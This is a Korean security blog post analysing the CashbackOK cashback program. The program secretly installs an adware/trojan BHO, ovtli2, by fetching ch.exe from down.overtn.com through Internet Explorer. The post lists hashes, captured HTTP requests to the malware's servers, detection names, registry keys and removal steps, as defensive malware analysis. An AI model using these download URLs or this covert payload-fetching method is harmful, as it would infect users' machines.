울지않는벌새 : Security, Movie & Society

국내 악성코드 : CashbackOK

벌새::Analysis
국내에서 제작된 적립금 프로그램 CashbackOK를 설치할 경우 사용자 몰래 추가적인 악성코드를 설치하는 것을 확인하였습니다.

CashbackOK Setup 설치 파일(MD5 : 367f2e1b7a6ba2cf549c650dc81d8ead)을 이용하여 프로그램을 초기 설치하였을 당시에는 CashbackOK 프로그램만을 설치하지만, 프로그램이 설치된 환경에서 사용자가 Internet Explorer를 통해 인터넷을 이용할 경우 사용자 몰래 ovtli2 프로그램을 설치하는 것을 확인할 수 있습니다.

생성 폴더, 파일 정보


CashbackOK 프로그램은 사용자에게 설치 과정에서 어떠한 화면 정보를 제공하지 않으며 설치가 이루어지며, 해당 프로그램은 [cashbackokpack] 폴더에 프로그램을 설치하는 것을 확인할 수 있습니다.


프로그램이 설치된 환경에서 사용자가 Internet Explorer를 실행할 경우 iexplore.exe 프로세스에 cashbackokpack.dln 파일을 추가하여 동작을 1회 실행합니다.

cashbackokpack.dln


해당 cashbackokpack.dln 파일은 사용자가 웹 브라우저를 통해 인터넷을 사용할 경우 특정 서버에서 ch.exe(MD5 : ce300e38e0e73f1585456036da9ac6ae) 파일을 Payload하여 추가적인 프로그램 ovtli2를 사용자 몰래 설치하고 있습니다.

[cashbackokpack.dln 네이워크 연결 정보]

1. 프로그램 설치를 위한 버전 체크

Http: Request, GET /guidetoolbar4/exe/version_t.html
Command: GET
URI: /guidetoolbar4/exe/version_t.html?set=105&pid=
ProtocolVersion: HTTP/1.1
ContentType:  text/html
Host:  ov.overtn.com
Accept:  text/html, */*
UserAgent:  Mozilla/3.0 (compatible; Indy Library)
HeaderEnd: CRLF

2. ovtli2 설치 파일 ch.exe 다운로드

Http: Request, GET /a1/bhon/ch.exe
Command: GET
URI: /a1/bhon/ch.exe
ProtocolVersion: HTTP/1.1
Accept:  */*
Accept-Encoding:  gzip, deflate
UserAgent:  Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host:  down.overtn.com
Connection:  Keep-Alive
HeaderEnd: CRLF


다운로드된 ch.exe 파일은 [%Temp%\tmp_(임의의 숫자+영문).exe] 파일 형태로 자가 복제를 하여 프로그램을 설치하는 것을 확인할 수 있습니다.

이렇게 설치된 프로그램은 [ovtli2] 폴더에 프로그램을 설치하며, 수시로 폴더명을 변경하여 사용자를 속이고 있는 것으로 알고 있습니다.

이전에 살펴본 국내 온라인 음악 플레이어의 경우 사용자 몰래 프로그램을 설치하면서 oiule2 폴더에 프로그램을 설치하듯이 동일한 서버에서 현재는 다른 폴더명으로 프로그램을 꾸준하게 유포하는 것을 보실 수 있습니다.

[생성 파일 진단 정보]

C:\Program Files\cashbackokpack\install.exe (Kaspersky : not-a-virus:AdWare.Win32.AdMoke.cmq)
C:\Program Files\cashbackokpack\unreg.exe (AhnLab : Win-Trojan/Banload.569856.E)
C:\Program Files\cashbackokpack\cashbackokpack.dln (Kaspersky : not-a-virus:AdWare.Win32.BHO.gfx)
C:\Program Files\ovtli2\ovtli2.dll (nProtect : Trojan-Clicker/W32.AdMoke.622080.C)

cashbackokreward.dll

cashbackokside.dll


이렇게 최종적인 프로그램이 설치가 이루어지면 사용자가 인터넷을 이용할 경우 cashbackokpack.dln 파일은 iexplore.exe 프로세스에 추가되지 않고 동작을 하며, cashbackokreward.dll / cashbackokside.dll / ovtli2.dll 3개의 파일이 BHO 방식으로 추가되어 적립금 프로그램, 사이드바 광고 등의 동작을 할 것으로 보입니다.

CashbackOK 프로그램의 정상적인 사용은 해당 서비스 사이트에 회원 가입을 통한 특정 온라인 쇼핑몰에서 물품 구매에 따라 포인트 누적을 통한 수익을 얻을 수 있습니다.

ovtli2.dll


하지만 사용자 몰래 추가로 설치된 ovtli2 프로그램의 경우 CashbackOK 프로그램 배포 사이트에서 파일이 제공되지 않고 있으며, BHO 방식으로 동작을 하면서 프로그램에 등록된 국내 인터넷 쇼핑몰 사이트에서 적립금 포인트 또는 광고 수익을 얻는 것으로 추정됩니다.

일반적인 적립금 서비스의 경우 회원 가입을 통한 절차가 있는 반면 해당 프로그램은 서비스 사이트를 확인할 수 없으므로 실제 사용자 컴퓨터에서 동작하는 것을 통해 사용자가 아닌 프로그램 배포자에게만 수익이 발생할 수 있다고 생각됩니다.


실제 ovtli2 프로그램에서 제공하는 서비스 공급자의 사이트 정보를 보시면 사용자가 접근할 수 없도록 구성되어 있으며 일종의 형식만 갖춘 것을 확인할 수 있습니다.


프로그램 삭제시에는 반드시 Internet Explorer를 비롯한 모든 프로그램을 종료한 상태에서 [cashbackokpack Uninstall] 삭제 항목과 [ovtli2 Uninstall] 삭제 항목을 이용하여 삭제하실 수 있습니다.

이런 경우 ovtli2 프로그램만을 삭제할 경우 사용자가 인터넷을 사용하는 과정에서 또 다시 cashbackokpack.dln 파일을 동작하여 재설치를 할 수 있으므로 반드시 CashbackOK 프로그램을 함께 삭제를 하시기 바랍니다.

프로그램 삭제 후에는 추가적으로 [%Temp%\tmp_(임의의 숫자+영문).exe] 파일을 찾아 수동 삭제를 하시기 바라며, 국내외 보안 제품에서 악성코드로 진단하므로 시스템 정밀 검사를 병행하시기 바랍니다.

[CashbackOK 프로그램 : 생성 레지스트리 등록 정보]

HKEY_CLASSES_ROOT\.dln
HKEY_CLASSES_ROOT\.gtb
HKEY_CLASSES_ROOT\AppID\cashbackokreward.DLL
HKEY_CLASSES_ROOT\AppID\cashbackokside.DLL
HKEY_CLASSES_ROOT\AppID\{30ECFA96-1A2B-4A81-A99B-ED7743079160}
HKEY_CLASSES_ROOT\AppID\{7328DED5-A2A1-4B59-A5FB-F00735E71219}
HKEY_CLASSES_ROOT\cashbackokpack.Windows helper
HKEY_CLASSES_ROOT\cashbackokreward.cashbackokreward
HKEY_CLASSES_ROOT\cashbackokreward.cashbackokreward.1
HKEY_CLASSES_ROOT\cashbackokside.cashbackokside
HKEY_CLASSES_ROOT\cashbackokside.cashbackokside.1
HKEY_CLASSES_ROOT\CLSID\{19EA4A41-12B4-4738-9099-11219BE16ED5}
HKEY_CLASSES_ROOT\CLSID\{2BD80A0D-3DDC-4E9E-90F6-91BCF367D149}
HKEY_CLASSES_ROOT\CLSID\{75F51AFE-AD61-45dc-9B41-C981D97CD294}
HKEY_CLASSES_ROOT\CLSID\{80DD8EFA-BEF3-4DFA-8DF0-9B68698D8639}
HKEY_CLASSES_ROOT\Interface\{4A1B947E-9BA7-43FE-97F6-BDC9CD5A489A}
HKEY_CLASSES_ROOT\Interface\{F24C5E85-5582-4E1F-A159-649BAC3AA7D6}
HKEY_CLASSES_ROOT\TypeLib\{8347CDA8-FF41-4504-998E-042FAA8A39DF}
HKEY_CLASSES_ROOT\TypeLib\{E21122A3-1202-41FB-9CD8-3E07AF7980BE}
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Explorer Bars\{75F51AFE-AD61-45dc-9B41-C981D97CD294}
HKEY_LOCAL_MACHINE\SOFTWARE\CASHBA~1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Explorer Bars\{75F51AFE-AD61-45dc-9B41-C981D97CD294}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\
Browser Helper Objects\{2BD80A0D-3DDC-4E9E-90F6-91BCF367D149}

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\
Browser Helper Objects\{80DD8EFA-BEF3-4DFA-8DF0-9B68698D8639}

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
cashbackokpack


[ovtli2 프로그램 : 생성 레지스트리 등록 정보]

HKEY_CLASSES_ROOT\CLSID\{CC01FC6C-A236-40CB-A289-5BF3C626F975}
HKEY_CLASSES_ROOT\ovtli2.a1
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\
Browser Helper Objects\{CC01FC6C-A236-40CB-A289-5BF3C626F975}

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\
ovtli2 Uninstall